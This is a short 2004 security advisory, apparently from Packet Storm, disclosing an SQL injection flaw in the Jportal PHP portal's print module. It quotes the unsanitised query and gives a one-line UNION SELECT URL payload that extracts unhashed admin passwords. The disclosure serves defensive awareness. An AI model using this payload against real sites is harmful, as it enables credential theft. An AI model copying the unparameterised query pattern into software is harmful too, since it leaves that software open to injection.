Lucene search
K

jportal.txt

🗓️ 30 May 2004 00:00:00Reported by Maciek WierciskiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Jportal vulnerable to SQL injection exposing admin passwords; needs complete code rewrite.

Code
`  
  
Jportal is a portal system, quite commonly used:  
  
(Google)  
Results 1 - 10 of about 56,100 for "powered by jportal". (0.22 seconds)   
  
Homepage:  
http://jportal2.com/  
  
I've read its code and found:  
  
in module/print.inc.php:  
  
function art_print() {  
....  
$query = "SELECT * FROM $art_tbl WHERE id=$id";  
...  
}  
  
What to say? ;]  
  
example exploitation:  
http://xxxxx/print.php?what=article&id=X AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1  
  
result: unhashed admin password.  
  
There are a lot more bugs in it, imho whole system should be rewritten from a scratch (also using password hashing is a good thing i think :)  
  
Maciek 'ziemniaq' Wierci?ski  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 May 2004 00:00Current
7.4High risk
Vulners AI Score7.4
19